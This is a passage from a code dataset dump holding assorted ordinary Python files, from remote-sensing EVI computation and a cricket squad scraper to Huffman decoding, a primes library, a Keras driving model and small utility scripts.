b,r,n,meta, size\n\tblue = rt.open('S_'+datasets[dataset]+'_B02.tif')\n\tred = rt.open('S_'+datasets[dataset]+'_B04.tif')\n\tnir = rt.open('S_'+\tdatasets[dataset]+'_B08.tif')\n\tmeta = blue.meta.copy()\n\tmeta.update(dtype=rt.float32,count=1,compress='lzw')\n\n\tb = blue.read(1)\n\tb = b/10000\n\t#g = image.read(2)\n\tr = red.read(1)\n\tr = r/10000\n\tn = nir.read(1)\n\tn = n/10000\n\tsize = b.shape\n\n\ndef index():\n\tglobal evi, evi_f\n\tevi = np.true_divide(n-r,L+n+(C1*r)-(C2*b))\n\tevi = evi*G\n\tevi_f = np.zeros(size)\n\tfor i in range(size[0]-1):\n\t\tfor j in range(size[1]-1):\n\t\t\tif evi[i,j] >= 0 and evi[i,j] <= 1:\n\t\t\t\tevi_f[i,j] = evi[i,j]\n\t\t\telse:pass\n\n\twith rt.open('S_'+datasets[dataset]+'_EVI.tif', 'w', **meta) as create:\n\t create.write(evi_f.astype(rt.float32),1)\n\tplt.imshow(evi)\n\tplt.colorbar()\n\tplt.show()\n\ndataset = 0\nwhile dataset != amount:\n\tread()\n\tindex()\n\tdataset = dataset + 1\n\n","sub_path":"RemoteSensing/Processing(Python)/SMainScriptV0.py","file_name":"SMainScriptV0.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"152551336","text":"from bs4 import BeautifulSoup\r\nimport json\r\nimport requests\r\nimport re\r\nresponse = requests.get('http://www.cricbuzz.com/cricket-series/2676/indian-premier-league-2018/squads')\r\nsoup = BeautifulSoup(response.text, 'html.parser')\r\ncontent=soup.find(id=\"page-wrapper\")\r\n\r\ntemplist=['Chennai Super Kings',\r\n'Royal Challengers Bangalore',\r\n'Kings XI Punjab',\r\n'Rajasthan Royals',\r\n'Delhi Daredevils',\r\n'Mumbai Indians', \r\n'Sunrisers Hyderabad',\r\n'Kolkata Knight Riders']\r\n\r\nteams=[]\r\nx=0\r\nfor a in content.contents[7].find_all('a'):\r\n if a.string:\r\n #print(a.string)\r\n if a.string!='More Stats':\r\n #print(a.string)\r\n if a.string in templist:\r\n #print(a.string)\r\n if x>0:\r\n teams.append(newteam)\r\n #print(newteam) \r\n x=x+1\r\n newteam={} #make new team object here\r\n newteam['name']=a.string #assigning name to the team\r\n #newteam['captain']=\"\"\r\n newteam['squad']=[]\r\n else:\r\n newplayer={}\r\n newplayer['name']=a.string\r\n #newplayer['alias']=[]\r\n #print(a.string)\r\n newteam['squad'].append(newplayer) \r\n else:\r\n 
teams.append(newteam)\r\nprint(teams)","sub_path":"playerteammap.py","file_name":"playerteammap.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"389647490","text":"\"\"\"\nHuffman coding assigns variable length codewords to fixed length input characters based on their frequencies. More\nfrequent characters are assigned shorter codewords and less frequent characters are assigned longer codewords.\nAll edges along the path to a character contain a code digit. If they are on the left side of the tree, they will be a\n0 (zero). If on the right, they'll be a 1 (one). Only the leaves will contain a letter and its frequency count. All\nother nodes will contain a null instead of a character, and the count of the frequency of all of it and its descendant\ncharacters.\n\nhttps://www.hackerrank.com/challenges/tree-huffman-decoding/problem?h_l=interview&playlist_slugs%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D=trees\n\"\"\"\n\ndef decodeHuff(root, s):\n    \"\"\"\n\n    :param root: reference to the root node of the Huffman tree\n    :param s: Huffman encoded string\n    :return: the decoded string\n    \"\"\"\n\n    decoded_string = ''\n    st_len = len(s)\n    i = 0\n    while i < st_len:\n        c,i = get_char(root,s,i)\n        decoded_string += c\n    return decoded_string\n\ndef get_char(root, s, i):\n    # a leaf carries the decoded character; return it along with the next read position\n    if root.data != '':\n        return root.data, i\n    # inner node: consume one code digit, '0' goes left and '1' goes right\n    if s[i] == '0':\n        return get_char(root.left, s, i + 1)\n    else:\n        return get_char(root.right, s, i + 1)","sub_path":"Trees/huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563772975","text":"import pandas as pd\nimport sys\nimport os\nfrom .helpers import write_csv\n\n\"\"\"\nDoc Doc Doc\n\"\"\"\n\n\nclass TrapGraph:\n\n    def __init__(self, df, run_graph=True, file_name=None):\n        self.df = df\n        self.run_graph = run_graph\n        self.file_name = file_name\n        self.trap_num = None\n        self.graph = {}\n        self.root_nodes = []\n        self.root_pred_ids = []\n        self.branch_nodes = []\n        self.time_num_obj = []\n        self.root_endpoints = {}\n        self.graph_helper = {}\n        self._on_init()\n\n    def _on_init(self):\n\n        self.graph_helper[\"pred_id_last_node\"] = {}  # For each predID, tracks the last node of that id.\n        self.graph_helper[\"current_num_obj\"] = 0  # total_objs for current time_step\n        self.graph_helper[\"last_num_obj\"] = 0  # total_objs for last time_step\n        self.graph_helper[\"next_num_obj\"] = 0  # total_objs for next time_step\n        self.graph_helper[\"next_pred_ids\"] = []  # predID's present in next time_step\n\n        self._establish_root_nodes()\n        self._set_root_endpoints()\n\n        if self.run_graph:\n            self._make_graph()\n\n        # Some post-processing on self.graph to put edge nodes in numerical order.\n        for k in self.graph:\n            vals = [float(v) for v in self.graph[k]]\n            vals = sorted(vals)\n            vals = [str(round(v, 1)) for v in vals]\n            self.graph[k] = vals\n\n    def _establish_root_nodes(self):\n        \"\"\"\n        Doc Doc Doc\n        \"\"\"\n\n        start_time = self.df[\"time_num\"].unique()[0]\n        start_time_df = self.df.query(\"time_num == {}\".format(start_time))\n        len_time_step = len(start_time_df.index)\n        self.time_num_obj.append([start_time, len_time_step])\n        self.graph_helper[\"last_num_obj\"] = len_time_step\n\n        for i, node in enumerate(start_time_df.to_dict('records')):\n\n            pred_id = node[\"predecessorID\"]\n            time_num = node[\"time_num\"]\n            node_name = \"{}.{}\".format(time_num, pred_id)\n            self.graph[node_name] = 
[]\n self.root_nodes.append(node_name)\n self.root_pred_ids.append(pred_id)\n self.graph_helper[\"pred_id_last_node\"][pred_id] = node_name\n self.trap_num = node[\"trap_num\"]\n\n def _set_root_endpoints(self):\n \"\"\"\n Doc Doc Doc\n \"\"\"\n\n self.root_endpoints = {k: 0 for k in self.root_pred_ids}\n\n remaining_root_pred_ids = self.root_pred_ids.copy()\n\n for t in self.df[\"time_num\"].unique()[1:]:\n\n if not remaining_root_pred_ids:\n return\n\n time_df = self.df.query(\"time_num == {}\".format(t))\n step_info = time_df.to_dict('records')\n active_pred_ids = [v[\"predecessorID\"] for v in step_info]\n\n for root_pred_id in self.root_pred_ids:\n if root_pred_id not in remaining_root_pred_ids:\n continue\n if root_pred_id not in active_pred_ids:\n self.root_endpoints[root_pred_id] = max(t - 1, 1)\n remaining_root_pred_ids.remove(root_pred_id)\n\n for root_endpoint in self.root_endpoints:\n if self.root_endpoints[root_endpoint] == 0:\n self.root_endpoints[root_endpoint] = self.df[\"time_num\"].max()\n\n def _process_time_step(self, step_info):\n \"\"\"\n Doc Doc Doc\n \"\"\"\n\n # print(step_info)\n\n # Get Pred ID's in Current Time Step\n active_pred_ids = [v[\"predecessorID\"] for v in step_info]\n\n # Get Pred ID's in next Time Step (Branches will be these) Sort.\n assign_pred_ids = list(set(self.graph_helper[\"next_pred_ids\"]) - set(active_pred_ids))\n assign_pred_ids.sort(reverse=True)\n\n # Sort Step Info, Assignment will try to associate the lower current pred_id to the next lowest etc.\n step_info.sort(key=lambda x: x[\"predecessorID\"])\n isolated_pred_id = None\n parsed_steps = []\n for step in step_info:\n step_arr = [step[k] for k in step]\n if step_arr in parsed_steps:\n branch_node_name = \"{}.{}\".format(step[\"time_num\"], step[\"predecessorID\"])\n self.branch_nodes.append(branch_node_name)\n try:\n next_pred_id = assign_pred_ids.pop() # Pull from sorted assign_pred_ids, de-que\n except IndexError:\n if not isolated_pred_id:\n try:\n isolated_pred_id = max(self.graph_helper[\"next_pred_ids\"]) + 1\n print(\"POP ERROR - Isolated New Max:\", step_arr, isolated_pred_id)\n except ValueError:\n isolated_pred_id = step[\"predecessorID\"] + 1\n print(\"POP ERROR - Isolated New +1\", step_arr, isolated_pred_id)\n else:\n isolated_pred_id += 1\n print(\"POP ERROR - Isolated Existing\", step_arr, isolated_pred_id)\n next_pred_id = isolated_pred_id\n\n # print(\"GOT BRANCH:\", branch_node_name, step_arr, \"NextPredID:{}\".format(next_pred_id))\n step[\"predecessorID\"] = next_pred_id\n self.graph_helper[\"pred_id_last_node\"][step[\"predecessorID\"]] = branch_node_name\n active_pred_ids += [next_pred_id]\n\n parsed_steps.append(step_arr)\n\n return step_info\n\n def _make_graph(self):\n \"\"\"\n Doc Doc Doc\n \"\"\"\n\n # We are interested in changes that occur between time steps. 
So will create sub-df's using those times.\n # Start at 2nd index because _establish_root_nodes() handles above\n for t in self.df[\"time_num\"].unique()[1:]:\n\n # Run another filter of our initial filtered df from above on loop time step.\n time_df = self.df.query(\"time_num == {}\".format(t))\n next_time_df = self.df.query(\"time_num == {}\".format(t+1))\n\n # The number of data points per time-step may dictate behavior.\n len_time_step = len(time_df.index)\n len_next_time_step = len(next_time_df.index)\n next_time_step_pred_ids = list(next_time_df[\"predecessorID\"].unique())\n self.graph_helper[\"current_num_obj\"] = len_time_step\n self.graph_helper[\"next_num_obj\"] = len_next_time_step\n self.graph_helper[\"next_pred_ids\"] = next_time_step_pred_ids\n\n # Tracks number of obj seen per time step. Used in debug/display purposes.\n self.time_num_obj.append([t, len_time_step])\n\n step_info = time_df.to_dict('records')\n\n # Check for existence of root/mother cell, if not present, return since main branch has ended.\n active_pred_ids = [v[\"predecessorID\"] for v in step_info]\n for root_pred_id in self.root_pred_ids:\n if root_pred_id not in active_pred_ids:\n print(\"Root:{} absent in step:{}\".format(root_pred_id, step_info))\n return\n\n step_info = self._process_time_step(step_info)\n\n self.graph_helper[\"last_num_obj\"] = len(step_info)\n\n for node in step_info:\n\n pred_id = node[\"predecessorID\"]\n time_num = node[\"time_num\"]\n node_name = \"{}.{}\".format(time_num, pred_id)\n\n self.graph[node_name] = []\n try:\n pred_id_last_node_name = self.graph_helper[\"pred_id_last_node\"][pred_id]\n except KeyError:\n print(\"Error Pred_Id_Last_Node_Name 1, Setting Isolated Node:{}\".format(node_name))\n self.graph_helper[\"pred_id_last_node\"][pred_id] = node_name\n continue\n # print(pred_id)\n # print(step_info)\n # print(self.graph_helper)\n # print(node_name)\n # sys.exit()\n\n self.graph[node_name].append(pred_id_last_node_name)\n try:\n self.graph[pred_id_last_node_name].append(node_name)\n except KeyError:\n print(\"Error Pred_Id_Last_Node_Name 2\")\n print(node)\n print(pred_id_last_node_name)\n print(node_name)\n print(self.graph_helper)\n sys.exit()\n\n self.graph_helper[\"pred_id_last_node\"][pred_id] = node_name\n\n def write_cytoscape_network_csv(self):\n\n if not self.file_name:\n raise ValueError(\"Must Supply FileName to Generate CytoScape Network CSV\")\n\n if len(self.root_nodes) != 1:\n raise ValueError(\"Currently Only 1 Root Node Supported\")\n\n if not os.path.exists(\"cytoscape\"):\n os.mkdir(\"cytoscape\")\n\n # print(self.graph)\n\n res = [[\"source\", \"target\", \"interaction\", \"directed\", \"symbol\", \"value\"]]\n has_parsed = []\n for source_node in self.graph:\n for target_node in self.graph[source_node]:\n if target_node in has_parsed:\n continue\n symbol = source_node\n value = 1.0\n directed = True\n interaction = \"pp\"\n if source_node in self.root_nodes:\n directed = False\n\n res.append([source_node, target_node, interaction, directed, symbol, value])\n has_parsed.append(source_node)\n\n write_csv(\"cytoscape/{}_TrapNum_{}_cytoscape_network.csv\".format(self.file_name.replace(\".csv\", \"\"), self.trap_num), res)\n\n\n\n\n","sub_path":"cell_family_tree/parse/trap_graph.py","file_name":"trap_graph.py","file_ext":"py","file_size_in_byte":9677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342010959","text":"from rest_framework import generics\n\nfrom utils.api_helpers import 
get_datatable_json, DefaultNameOrdering\nfrom utils.api_logging import LoggingMixin\n\nfrom api.models import Milestone\nfrom api.serializers import MilestoneSerializer\n\n\nclass FeatureMappingMilestoneView(LoggingMixin, DefaultNameOrdering, generics.ListAPIView):\n \"\"\" List FeatureMapping Milestone objects \"\"\"\n queryset = Milestone.objects.all()\n serializer_class = MilestoneSerializer\n filterset_fields = ['name']\n\n\nclass FeatureMappingMilestoneDetailsView(LoggingMixin, generics.RetrieveUpdateDestroyAPIView):\n \"\"\" FeatureMapping Milestone single object management \"\"\"\n queryset = Milestone.objects.all()\n serializer_class = MilestoneSerializer\n\n\nclass FeatureMappingMilestoneTableView(LoggingMixin, DefaultNameOrdering, generics.ListAPIView):\n \"\"\" FeatureMapping Milestone table view formatted for DataTable \"\"\"\n queryset = Milestone.objects.all()\n serializer_class = MilestoneSerializer\n filterset_fields = ['name']\n\n def get(self, request, *args, **kwargs):\n return get_datatable_json(self, actions=False)\n","sub_path":"backend/reporting/api/views/feature_mapping/milestone.py","file_name":"milestone.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"595410139","text":"\"\"\"\nClass that represents a single linked\nlist node that holds a single value\nand a reference to the next node in the list\n\"\"\"\nclass Node:\n def __init__(self, value=None, next_node=None):\n self.value = value\n self.next_node = next_node\n\n def get_value(self):\n return self.value\n\n def get_next(self):\n return self.next_node\n\n def set_next(self, new_next):\n self.next_node = new_next\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n # add an itme to the end of the list\n def add_to_tail(self, value):\n # if value is a proper node then turn it into one\n if not isinstance(value, Node):\n value = Node(value)\n\n # if it is an empty list, then add value as head of the list\n if self.head is None:\n self.head = value\n\n else:\n # if it is not a empty list, then add value as the tail of the list\n # self.tail.next = value\n self.tail.set_next(value)\n self.tail = value\n\n return\n\n def remove_head(self):\n if self.head:\n # if the next node from the head is empty\n if self.head.get_next() == None:\n # set temp_head to current head\n temp_head = self.head\n # set both the current head and current tail to be empty\n self.head = None\n self.tail = None\n # then return the temporary head\n return temp_head.get_value()\n else:\n # else set the temporary head to the current head\n temp_head = self.head\n # set the current head to the next node\n self.head = self.head.get_next()\n # return the temporary head\n return temp_head.get_value()\n else:\n # else return None\n return None\n\n def contains(self, value):\n # set self.head to current_head\n current_head = self.head\n # while the current_head\n while current_head:\n # if current_head has a value\n if current_head.get_value() == value:\n # return true\n return True\n # set current_head to the next node \n current_head = current_head.get_next()\n # return false \n return False\n\n def get_max(self):\n current_head = self.head\n # set maximum value to None\n max_value = None\n\n while current_head:\n\n # if max_value is None or current_head value is greater than max value\n if max_value is None or current_head.get_value() > max_value:\n\n # set max_value to value of current_head\n max_value = 
current_head.get_value()\n\n            # set the current head to the next node of the current head\n            current_head = current_head.get_next()\n\n        # return max_value\n        return max_value ","sub_path":"linked_list/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466672136","text":"import datetime\nimport time\n\n\n# tw_date: 107/01/01\ndef tw_date2int(date_str):\n    date_split = date_str.split('/')\n    return int(\"{}{}{}\".format(int(date_split[0]) + 1911, date_split[1], date_split[2]))\n\n\ndef float_parser(float_str):\n    if float_str == \"X0.00\" or float_str == \"-\":\n        return 0.0\n\n    new_str = \"\"\n\n    try:\n        for char in float_str:\n            if char == ',':\n                continue\n\n            new_str += char\n\n        op_float = float(new_str)\n    except:\n        raise ValueError(\"error parsing {}\".format(float_str))\n\n    return op_float\n\n\ndef delay(sec):\n    start_datetime = datetime.datetime.now()\n    while (datetime.datetime.now() - start_datetime).total_seconds() < sec:\n        time.sleep(0.3)\n\n\ndef wait_retry(logger, sec):\n    logger.logp(\"Retry after {}s...\".format(sec))\n    time.sleep(sec)\n\n\ndef check_smd_content_by_key(day_data, key):\n    try:\n        if int(tw_date2int(day_data[0]) / 100) == int(key):\n            return True\n    except:\n        pass\n\n    return False\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39659158","text":"# Python program to transform the\n# image with the mouse\n\n#Import the libraries pygame and math\nimport pygame\nimport math\nfrom pygame.locals import *\nimport os\n\n# Take colors input\nRED = (255, 0, 0)\nBLACK = (0, 0, 0)\nYELLOW = (255, 255, 0)\n\n#Construct the GUI game\npygame.init()\n\n#Set dimensions of game GUI\nw, h = 600, 440\nscreen = pygame.display.set_mode((w, h))\n\n# Set running, angle and scale values\nrunning = True\nangle = 0\nscale = 1\n\n# Take image as input\nimg_logo = pygame.image.load('player.png')\nimg_logo.convert()\n\n# Draw a rectangle around the image\nrect_logo = img_logo.get_rect()\npygame.draw.rect(img_logo, RED, rect_logo, 1)\n\n# Set the center and mouse position\ncenter = w//2, h//2\nmouse = pygame.mouse.get_pos()\n\n#Store the image in a new variable\n#Construct the rectangle around image\nimg = img_logo\nrect = img.get_rect()\nrect.center = center\nos.system('python3 snack.py &')\n# Setting what happens when game is\n# in running state\nwhile running:\n\tfor event in pygame.event.get():\n\n\t\t# Close if the user quits the game\n\t\tif event.type == QUIT:\n\t\t\trunning = False\n\n\t\t# Set at which angle the image will\n\t\t# move left or right\n\t\tif event.type == KEYDOWN:\n\t\t\tif event.key == K_a:\n\t\t\t\tif event.mod & KMOD_SHIFT:\n\t\t\t\t\tangle -= 5\n\t\t\t\telse:\n\t\t\t\t\tangle += 5\n\n\t\t\t# Set at what ratio the image will\n\t\t\t# decrease or increase\n\t\t\telif event.key == K_s:\n\t\t\t\tif event.mod & KMOD_SHIFT:\n\t\t\t\t\tscale /= 1.5\n\t\t\t\telse:\n\t\t\t\t\tscale *= 1.5\n\t\t\t\t\n\t\t# Move the image with the specified coordinates,\n\t\t# angle and scale\t\t\n\t\telif event.type == MOUSEMOTION:\n\t\t\tmouse = event.pos\n\t\t\tx = mouse[0] - center[0]\n\t\t\ty = mouse[1] - center[1]\n\t\t\td = math.sqrt(x ** 2 + y ** 2)\n\t\t\tangle = math.degrees(-math.atan2(y, x))\n\t\t\t# scale = abs(5 * d / w)\n\t\t\timg = pygame.transform.rotate(img_logo, angle)\n\t\t\trect = 
img.get_rect()\n\t\t\trect.center = center\n\t\n\t# Set screen color and image on screen\n\tscreen.fill(YELLOW)\n\tscreen.blit(img, rect)\n\n\t# Draw the rectangle, line and circle through\n\t# which image can be transformed\n\tpygame.draw.rect(screen, BLACK, rect, 3)\n\tpygame.draw.line(screen, RED, center, mouse, 2)\n\tpygame.draw.circle(screen, RED, center, 6, 1)\n\tpygame.draw.circle(screen, BLACK, mouse, 6, 2)\n\t\n\t# Update the GUI game\n\tpygame.display.update()\n\n# Quit the GUI game\npygame.quit()\n","sub_path":"[MicroGame]/TestRotate.py","file_name":"TestRotate.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86660408","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Image',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('resource_url', models.CharField(max_length=200)),\n ('is_active', models.BooleanField(default=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Resort',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('name', models.CharField(max_length=100)),\n ('resource_url', models.URLField()),\n ('latitude', models.FloatField()),\n ('longitude', models.FloatField()),\n ('overview', models.TextField()),\n ('about', models.TextField()),\n ('is_active', models.BooleanField(default=True)),\n ('snow_upper_depth', models.IntegerField(default=0)),\n ('snow_middle_depth', models.IntegerField(default=0)),\n ('snow_lower_depth', models.IntegerField(default=0)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='image',\n name='resort',\n field=models.ForeignKey(to='resorts.Resort'),\n preserve_default=True,\n ),\n migrations.CreateModel(\n name='SnowFall',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('updated', models.DateTimeField(auto_now=True)),\n ('amount', models.IntegerField()),\n ('event_date', models.DateField()),\n ('resort', models.ForeignKey(to='resorts.Resort')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"skihub/resorts/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"167520418","text":"import os\n\n\nd = {'x':1,'y':2,'z':3}\nfor k,v in d.items():\n\tprint(k,'=',v)\n\n\nd1 = {'x':'a','y':'2','z':'3'}\nprint([k+'='+v for k,v in d1.items()])\n\nd2 = ['Hello','WorlD','IBM','Apple']\nprint([s.lower() for s in d2])\n","sub_path":"pythonBase/importTest.py","file_name":"importTest.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465567118","text":"from django.conf.urls.defaults import patterns, 
include\n\nfrom records.views import CreateWishView, CreateGiftView, WishListView\n\nurlpatterns = patterns('records.views',\n (r'^wishes$', WishListView.as_view()),\n (r'^wishes/add$', CreateWishView.as_view()),\n (r'^gifts/add$', CreateGiftView.as_view()),\n #(r'^$', ProfileListView.as_view()),\n #(r'^(?P[0-9]+)', ProfileDetailView.as_view()),\n #(r'^edit/$', UserUpdateView.as_view()),\n)\n","sub_path":"records/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78219518","text":"def numericDivider(A, B):\n A = A.split('.')\n B = B.split('.')\n a = len(A)\n b = len(B)\n min_len = min(len(A), len(B))\n rest = ''\n for i in range(min_len):\n if int(A[i]) > int(B[i]):\n return 1\n\n elif int(A[i]) < int(B[i]):\n return -1\n\n else:\n continue\n\n if len(A) > len(B):\n for i in range(b, a):\n rest += str(A[i])\n\n elif len(B) > len(A):\n for i in range(a, b):\n rest += str(B[i])\n\n if len(A) > len(B) and int(rest) != 0:\n return 1\n\n elif len(B) > len(A) and int(rest) != 0:\n return -1\n\n else:\n return 0\n\n\nr = numericDivider('01.0', '1.0')\nprint(r)\n","sub_path":"Strings/compare-versions.py","file_name":"compare-versions.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"308534247","text":"'''\nOriginal Author: Kaden Archibald\nARES Team - Navigation & Autonomy\nhttps://github.com/USU-Ares/Navigation_2019\n\nUtah State University\nDepartment of Mechanical and Aerospace Engineering\n\nCreated: Jan 11, 2019\nRevised: Feb 20, 2019\nVersion: IPython 6.2.1 (Anaconda distribution) with Python 3.6.4\n\nDriver Code for Main GUI\n'''\n\n\ntry:\n import MasterGUI as gui\nexcept ModuleNotFoundError:\n print('MasterGUI.py source code not found')\n input('Press return to exit')\n quit()\n\n\ndef main(*args, **kwargs):\n \n # Create application\n application = gui.MasterGUI(master = gui.root)\n application.master.title('USU Ares Rover')\n \n # Run application\n application.appExec()\n \n return None\n\n\n\nif __name__ == '__main__':\n try:\n print('Starting GUI...')\n main()\n \n except KeyboardInterrupt as keyStop:\n print('Error: ', keyStop)\n \n except gui.tk.TclError as tkStop:\n pass\n \n finally:\n print('Terminating GUI...')\n gui.MasterGUI.halt(gui.MasterGUI)\n ","sub_path":"src/GUI/MasterGUIMain.py","file_name":"MasterGUIMain.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327941866","text":"#A library of useful utility functions for primes\n\nimport math\n\ndef listPrimesUpTo(n):\n #List primes up to n\n s=list(range(0,n+1))\n s[1]=0\n bottom=2\n top=n//bottom\n while (bottom*bottom<=n):\n while (bottom<=top):\n if s[top]:\n s[top*bottom]=0\n top-=1\n bottom+=1\n top=n//bottom\n return [x for x in s if x]\n\ndef prime(i, primes):\n for prime in primes:\n if not (i == prime or i % prime):\n return False\n primes.add(i)\n return i\n\ndef listFirstPrimes(n):\n #Lists the first n primes\n primes = set([2])\n i, p = 2, 0\n while True:\n if prime(i, primes):\n p += 1\n if p == n:\n return primes\n i += 1\n\n\ndef numDivisors(n):\n primes = listPrimesUpTo(n)\n numberOfDivisors = 1\n for p in primes:\n count = 1\n while n%p == 0:\n n /= p\n count += 1\n numberOfDivisors *= count\n if n == 1:\n break\n return int(numberOfDivisors)\n\ndef millerRabin(a,s,d,n):\n a_to_power = pow(a, 
d, n)\n if a_to_power == 1:\n return True\n for i in range(s-1):\n if a_to_power == n - 1:\n return True\n a_to_power = (a_to_power * a_to_power) % n\n return a_to_power == n - 1\n\n\ndef isPrime(n):\n\t#We use a deterministic Miller-Rabin algorithm (we assume n < 2,152,302,898,747, so we only check 2,3,5,7,11)\n if n > 2152302898746:\n raise NameError('Prime is above Miller-Rabin Limit, please change primesLib.isPrime to proceed')\n if n < 2:\n return False\n if n in {2,3,5,7,11}:\n return True\n\n d = n - 1\n s = 0\n while d % 2 == 0:\n d >>= 1\n s += 1\n for a in {2,3,5,7,11}:\n if not millerRabin(a, s, d, n):\n return False\n return True\n","sub_path":"primesLib.py","file_name":"primesLib.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"44508017","text":"import csv\nimport cv2\nimport numpy as np\nimport sklearn\n\n# Read the data images\nsamples = []\ncorrections = [0.0, 0.25, -0.25] # used for center, left, right image\nwith open('data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n # Skip the header\n next(reader)\n for line in reader:\n for i in range(3): # Add the 3 images with their corrections, so they can be suffled later\n angle = float(line[3]) + corrections[i]\n samples.append([line[i], angle])\n\n# Split the samples for training and validation\nfrom sklearn.model_selection import train_test_split\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n np.random.shuffle(samples)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n\n images = []\n measurements = []\n for batch_sample in batch_samples:\n source_path = batch_sample[0]\n filename = source_path.split('/')[-1]\n current_path = 'data/IMG/' + filename\n image = cv2.imread(current_path)\n images.append(image)\n measurement = batch_sample[1]\n measurements.append(measurement)\n # Flip Image and add it to the batch also\n images.append(cv2.flip(image, 1))\n measurements.append(measurement * -1.0)\n\n X_train = np.array(images)\n y_train = np.array(measurements)\n yield sklearn.utils.shuffle(X_train, y_train)\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D\nfrom keras.layers.convolutional import Convolution2D\n\n# Preprocessing \nmodel = Sequential()\n# Crop first to work with less data\nmodel.add(Cropping2D(cropping=((70,25),(0,0)), input_shape=(160, 320, 3)))\nmodel.add(Lambda(lambda x: (x / 255.0) - 0.5))\n\n# NVIDIA model\nmodel.add(Convolution2D(24,5,5, subsample=(2,2), activation=\"relu\"))\nmodel.add(Convolution2D(36,5,5, subsample=(2,2), activation=\"relu\"))\nmodel.add(Convolution2D(48,5,5, subsample=(2,2), activation=\"relu\"))\nmodel.add(Convolution2D(64,3,3, activation=\"relu\"))\nmodel.add(Convolution2D(64,3,3, activation=\"relu\"))\nmodel.add(Flatten())\nmodel.add(Dense(100))\nmodel.add(Dense(50))\nmodel.add(Dense(1))\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=32)\nvalidation_generator = generator(validation_samples, batch_size=32)\n\nmodel.compile(loss='mse', optimizer='adam')\n\n# Samples per epoch is * 2, cause for each batch we return double images (normal and flipped)\nhistory_object = model.fit_generator(train_generator, \\\n 
samples_per_epoch=(len(train_samples) * 2), \\\n                                     validation_data=validation_generator, \\\n                                     nb_val_samples=(len(validation_samples) * 2), \\\n                                     nb_epoch=3, verbose=1)\n\nmodel.save('model.h5')\n\n# Model visualization\nfrom keras.utils.visualize_util import plot as model_plot\nmodel_plot(model, to_file='images/model.png', show_shapes=True, show_layer_names=False)\n\n### plot the training and validation loss for each epoch\nimport matplotlib.pyplot as plt\nplt.plot(history_object.history['loss'])\nplt.plot(history_object.history['val_loss'])\nplt.title('model mean squared error loss')\nplt.ylabel('mean squared error loss')\nplt.xlabel('epoch')\nplt.legend(['training set', 'validation set'], loc='upper right')\nplt.show()\n\nexit()\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"551649553","text":"#!/opt/local/bin/python\n# -*- coding: utf-8 -*- \n'''quick script to add a confusion flag to the full mangahi database without eliminating any rows which don't have entries in the confusion table (topcat does not make this easy!)\n'''\n\nfrom astropy.io import fits\nimport numpy as np\nimport pdb \nimport sys\n\ndef 